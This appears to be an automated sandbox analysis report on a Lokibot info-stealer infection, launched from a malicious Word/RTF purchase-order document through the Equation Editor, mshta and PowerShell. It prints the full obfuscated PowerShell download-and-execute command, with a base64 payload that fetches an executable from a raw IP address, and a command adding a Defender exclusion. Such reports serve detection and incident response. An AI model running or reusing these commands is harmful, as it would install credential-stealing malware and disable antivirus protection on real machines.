                Source: 00000010.00000002.422950577.0000000003288000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000012.00000002.654622454.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                Source: 00000010.00000002.422950577.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: Process Memory Space: wininit.exe PID: 2092, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: Process Memory Space: wininit.exe PID: 772, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18F2865F.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestoptionforentiretimegivenmebackwith______suchagreatthignswithentiretimewithmegood______seethebestthignsalwaysgivnebestthigns[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: caspol[1].exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wininit.exe.10.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, BE5k0LFu5KnoWIB8ne.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, BE5k0LFu5KnoWIB8ne.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.SetAccessControl
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 16.2.wininit.exe.4e00000.6.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.AddAccessRule
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.SetAccessControl
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 16.2.wininit.exe.32ccfe0.3.raw.unpack, KQkH3in3AYxtB1JkcI.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winDOC@22/41@7/3
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,18_2_0040650A
                Source: C:\Users\user\AppData\Roaming\wininit.exeCode function: 18_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,18_2_0040434D
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$-000041492.docx.docJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                Source: C:\Users\user\AppData\Roaming\wininit.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8239.tmpJump to behavior
                Source: PO-000041492.docx.docOLE indicator, Word Document stream: true
                Source: 4.466364_2401 PACKING LIST.xlsx.0.drOLE indicator, Workbook stream: true
                Source: PO-000041492.docx.docOLE document summary: title field not present or empty
                Source: ~WRF{AEC8DEF0-2232-4A59-9D7A-1B902DE75BDE}.tmp.0.drOLE document summary: title field not present or empty
                Source: ~WRF{AEC8DEF0-2232-4A59-9D7A-1B902DE75BDE}.tmp.0.drOLE document summary: author field not present or empty
                Source: ~WRF{AEC8DEF0-2232-4A59-9D7A-1B902DE75BDE}.tmp.0.drOLE document summary: edited time not present or 0
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................0.......(.P.....0.......8................_.........................s...............................s............Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................_.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................I.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................I.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................I.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................I.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................I.........................s............................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................I.........................s..............".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................t.h.a.t. .t.h.e. .p.a.t.h. .i.s. .c.o.r.r.e.c.t. .a.n.d. .t.r.y. .a.g.a.i.n.......".....N.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................I...................... .a.g.a...........".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........J...................... .a.g.a..........."..... .......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................J...................... .a.g.a...........".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .d.e.V.i.C.E.c.r.E.D.E.n.t.i.A.L.d.E.p.l.O.Y.m.e.N.t......... .a.g.a...........".....8.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8...............5J...................... .a.g.a...........".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......... .a.g.a...........".....8.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8...............SJ...................... .a.g.a...........".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8...............fJ...................... .a.g.a.........................................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8...............rJ...................... .a.g.a...........".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .n.g.). .[.].,. .C.o.m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n.a...........".....F.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................J......................i.o.n.a...........".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................J......................i.o.n.a.................l.......................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................J......................i.o.n.a...........".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....0.......8................J......................i.o.n.a...........".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....0.......8................J......................i.o.n.a...........".............................Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Ry.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................^y.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................py.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................|y.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................y.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................y.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................y.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................y.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........y.........................s.................... .......8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................y.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................y.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................y.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......z.........................s....................$.......8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................z.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................$z.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................0z.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................Nz.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................`z.........................s....................l.......8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................lz.........................s............................................
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................~z.........................s............................8...............
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................z.........................s............................8...............
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {00020830-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\verclsid.exe "C:\Windows\system32\verclsid.exe" /S /C {00020830-0000-0000-C000-000000000046} /I {00000112-0000-0000-C000-000000000046} /X 0x5Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\goodtoseeuthatgreatthingswithentirethingsgreatf.hta" Jump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEm32\WINDOwSPOWershELL\V1.0\poWERShell.eXe" "poWershELl.ExE -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNt ; InvOKe-EXpreSSion($(iNvoke-EXpreSSIoN('[sYStem.TExT.eNcoDiNg]'+[CHar]0x3A+[chAr]58+'Utf8.gETsTriNg([systEm.coNvErT]'+[ChAR]0X3a+[CHAr]58+'fRoMbaSE64sTRinG('+[ChaR]0x22+'JGozckggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYmVyZGVGSW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1UkxNb04uRGxsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTE9ETWxJWUZIRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMcmQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtDTXYsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc0t3aFNVZ0ZkKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUEtKbWRxIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMWVBocGZaVmggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGozckg6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly82Ni42My4xODcuMjMxLzMzL2Nhc3BvbC5leGUiLCIkRU52OkFQUERBVEFcd2luaW5pdC5leGUiLDAsMCk7U1RBUlQtU2xFRVAoMyk7aUV4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVx3aW5pbml0LmV4ZSI='+[CHAR]0x22+'))')))"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bypAss -nOP -W 1 -C deViCEcrEDEntiALdEplOYmeNtJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\b2mggwzy\b2mggwzy.cmdline"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES950F.tmp" "c:\Users\user\AppData\Local\Temp\b2mggwzy\CSC80BAF758EA8A4749878CF9DF238E437.TMP"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\wininit.exeProcess created: C:\Users\user\AppData\Roaming\wininit.exe "C:\Users\user\AppData\Roaming\wininit.exe"Jump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
